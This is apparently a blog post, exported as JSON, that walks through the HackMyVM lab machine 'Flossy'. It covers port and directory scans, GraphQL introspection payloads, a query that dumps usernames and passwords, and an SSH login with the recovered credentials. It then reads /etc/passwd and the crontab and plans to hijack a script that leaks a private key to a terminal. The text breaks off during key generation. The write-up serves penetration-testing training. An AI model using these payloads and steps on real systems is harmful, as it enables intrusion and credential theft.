{"id":572,"date":"2024-04-16T15:27:27","date_gmt":"2024-04-16T07:27:27","guid":{"rendered":"http:\/\/162.14.82.114\/?p=572"},"modified":"2024-04-16T15:27:27","modified_gmt":"2024-04-16T07:27:27","slug":"hmv-_-flossy","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/572\/04\/16\/2024\/","title":{"rendered":"hmv[-_-]Flossy"},"content":{"rendered":"<h1>Flossy<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523232.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523232.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416133634190\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523234.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523234.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416133717717\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.104 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 192.168.0.104:22\nOpen 192.168.0.104:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp open  http    syn-ack Node.js Express framework\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: About Rick and Morty\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Flossy]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.104\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              jpg,txt,png,php,zip,git\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration 
mode\n===============================================================\nProgress: 175330 \/ 1543927 (11.36%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 175872 \/ 1543927 (11.39%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>The scan turned up nothing, so I stopped scanning for now.<\/p>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/192.168.0.104<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.0.104\n+ Target Hostname:    192.168.0.104\n+ Target Port:        80\n+ Start Time:         2024-04-16 01:39:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: No banner retrieved\n+ \/: Retrieved x-powered-by header: Express.\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. 
This file contains the credentials.\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-16 01:40:15 (GMT-4) (55 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523235.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523235.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416134142981\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Try entering an arbitrary value:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523236.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523236.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416134301335\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<p>Hmm, capture the request?<\/p>\n<pre><code class=\"language-bash\">POST \/graphql HTTP\/1.1\nHost: 192.168.0.104\nContent-Length: 72\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nContent-Type: application\/json\nAccept: *\/*\nOrigin: http:\/\/192.168.0.104\nReferer: http:\/\/192.168.0.104\/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\n{&quot;query&quot;:&quot;{ character(id:1) { name, status, species, gender, image } }&quot;}<\/code><\/pre>\n<pre><code class=\"language-bash\">HTTP\/1.1 200 OK\nX-Powered-By: Express\nContent-Type: application\/json; charset=utf-8\nContent-Length: 163\nETag: W\/&quot;a3-85k+FlivGwj6NUbOZXXG5nLcjIQ&quot;\nDate: Tue, 16 Apr 2024 05:45:35 GMT\nConnection: close\n\n{&quot;data&quot;:{&quot;character&quot;:{&quot;name&quot;:&quot;Rick Sanchez&quot;,&quot;status&quot;:&quot;Alive&quot;,&quot;species&quot;:&quot;Human&quot;,&quot;gender&quot;:&quot;Male&quot;,&quot;image&quot;:&quot;https:\/\/rickandmortyapi.com\/api\/character\/avatar\/1.jpeg&quot;}}}<\/code><\/pre>\n<p>Try looking it up:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523237.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523237.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416134943335\" style=\"zoom:67%;\" 
\/><\/div><\/p>\n<p>The endpoint turns out to be <code>GraphQL<\/code>, so look up the relevant information on <code>hacktricks<\/code>:<\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/graphql\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/graphql<\/a><\/p>\n<p>Construct the payload:<\/p>\n<pre><code class=\"language-bash\">{&quot;query&quot;:&quot;{__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}&quot;}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523238.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523238.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416135742816\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This reveals the following:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523239.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523239.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416140451970\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>And also:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523240.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523240.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416140103255\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Try querying it:<\/p>\n<pre><code class=\"language-bash\">{&quot;query&quot;:&quot;{users(id:9) { username password } }&quot;}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523241.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523241.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416140721709\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<p>Try brute-forcing it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523242.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523242.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416140841230\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This yields:<\/p>\n<pre><code class=\"language-apl\">malo\n8YdsA3CkiWx968<\/code><\/pre>\n<h3>Try logging in over SSH<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523243.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523243.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416141048979\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523244.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404161523244.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240416141100485\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">\u256d\u2500malo@flossy ~ \n\u2570\u2500$ pwd\n\/home\/malo\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ ls -la\ntotal 216\ndrwxr-xr-x  5 malo malo   4096 Apr 16 08:11 .\ndrwxr-xr-x  4 root root   4096 Oct  6  2023 ..\n-rw-------  1 malo malo      4 Oct  7  2023 .bash_history\n-rw-r--r--  1 malo malo    220 Oct  6  2023 .bash_logout\n-rw-r--r--  1 malo malo   3526 Oct  6  2023 .bashrc\ndrwxr-xr-x  3 malo malo   4096 Oct  6  2023 .local\ndrwxr-xr-x 12 malo malo   4096 Apr 16 08:10 .oh-my-zsh\n-rw-r--r--  1 malo malo    807 Oct  6  2023 .profile\ndrwx------  2 malo malo   4096 Oct 10  2023 .ssh\n-rw-r--r--  1 malo malo  51798 Apr 16 08:10 .zcompdump-flossy-5.9\n-r--r--r--  1 malo malo 119920 Apr 16 08:10 .zcompdump-flossy-5.9.zwc\n-rw-------  1 malo malo     84 Apr 16 08:11 .zsh_history\n-rw-r--r--  1 malo malo   3890 Oct  6  2023 .zshrc\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cat .bash_history \ntty\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cat \/etc\/passwd  
\nroot:x:0:0:root:\/root:\/usr\/bin\/zsh\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmalo:x:1000:1000:,,,:\/home\/malo:\/bin\/zsh\ndnsmasq:x:103:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\nsophie:x:1001:1001:,,,:\/home\/sophie:\/bin\/zsh\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ sudo -l\n[sudo] password for malo: \nSorry, user malo may not run sudo on flossy.\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cat \/etc\/cron*                                                                                                                                  1 \u21b5\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: 
\/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cd ..                                                                                                                                           
1 \u21b5\n\u256d\u2500malo@flossy \/home \n\u2570\u2500$ ls -la\ntotal 16\ndrwxr-xr-x  4 root   root   4096 Oct  6  2023 .\ndrwxr-xr-x 18 root   root   4096 Jul 22  2023 ..\ndrwxr-xr-x  5 malo   malo   4096 Apr 16 08:12 malo\ndrwxr-xr-x  5 sophie sophie 4096 Oct 10  2023 sophie\n\u256d\u2500malo@flossy \/home \n\u2570\u2500$ cd sophie \n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ ls -la \ntotal 56\ndrwxr-xr-x  5 sophie sophie 4096 Oct 10  2023 .\ndrwxr-xr-x  4 root   root   4096 Oct  6  2023 ..\n-rw-------  1 root   root    370 Oct 10  2023 .bash_history\n-rw-r--r--  1 sophie sophie  220 Oct  6  2023 .bash_logout\n-rw-r--r--  1 sophie sophie 3526 Oct  6  2023 .bashrc\ndrwxr-xr-x  3 sophie sophie 4096 Oct  6  2023 .local\n-rwxr-----  1 root   sophie  962 Oct  6  2023 network\ndrwxr-xr-x 12 sophie sophie 4096 Oct  6  2023 .oh-my-zsh\n-rw-r--r--  1 sophie sophie  807 Oct  6  2023 .profile\n-rw-r--r--  1 sophie sophie   66 Oct  7  2023 .selected_editor\ndrwx------  2 sophie sophie 4096 Oct 10  2023 .ssh\n-rwxr-xr-x  1 sophie sophie  630 Oct 10  2023 SSHKeySync\n-rwx------  1 sophie sophie   33 Oct 10  2023 user.txt\n-rw-r--r--  1 sophie sophie 3890 Oct  6  2023 .zshrc<\/code><\/pre>\n<p>There is another user, <code>sophie<\/code>; continue gathering information:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ file SSHKeySync \nSSHKeySync: Bourne-Again shell script, ASCII text executable\n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ cat SSHKeySync \n#!\/bin\/bash\n\n# This script must run every minute in pre-prod\n\nsend_private_key() {\n    local user_name=&quot;$1&quot;\n    local key_path=&quot;\/home\/$user_name\/.ssh\/id_rsa&quot;\n    local admin_tty=&quot;\/dev\/pts\/24&quot;\n\n    if [ -f &quot;$key_path&quot; ]; then\n        if [ -w &quot;$admin_tty&quot; ]; then\n            cat &quot;$key_path&quot; &gt; &quot;$admin_tty&quot;\n        else\n   
         echo &quot;Error: Unable to write to $admin_tty&quot;\n        fi\n    else\n        echo &quot;Error: The private key for $user_name doesn&#039;t exist.&quot;\n    fi\n}\n\nwhile true ; do\n  USER=&quot;sophie&quot;\n  echo &quot;Sending $USER&#039;s private key to a high-privileged TTY for quick testing...&quot;\n  send_private_key &quot;$USER&quot;\n  sleep 1m\ndone    \n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ tty\n\/dev\/pts\/0\n\u256d\u2500malo@flossy \/home\/sophie \n\u2570\u2500$ ls \/dev\/pts\/*\n\/dev\/pts\/0  \/dev\/pts\/ptmx<\/code><\/pre>\n<h3>Create pts24 to connect as sophie<\/h3>\n<p>Try to create pseudo-terminal 24 so that the script sends the information to us. As we know, every ssh connection creates a pseudo-terminal, so we need to open ssh connections repeatedly. Typing the password every time is tedious, so create a key pair to log in with:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500malo@flossy ~ \n\u2570\u2500$ pwd   \n\/home\/malo\n\u256d\u2500malo@flossy ~ \n\u2570\u2500$ cd .ssh\n\u256d\u2500malo@flossy ~\/.ssh \n\u2570\u2500$ ssh-keygen \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/malo\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/malo\/.ssh\/id_rsa\nYour public key has been saved in \/home\/malo\/.ssh\/id_rsa.pub\nThe key fingerprint is:\nSHA256:zui2pCPL59xkuWnA1l4\/igl6Mrdv9aLmXBE\/\/N85tU8 malo@flossy\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|                 |\n|                 |\n|        .        |\n|         +       |\n|   . .  S +      |\n|    + .=o. o    .|\n|   ..o*o+o  .   E|\n| .+o=X**. +  . =.|\n|  +X=X&amp;o.o .  
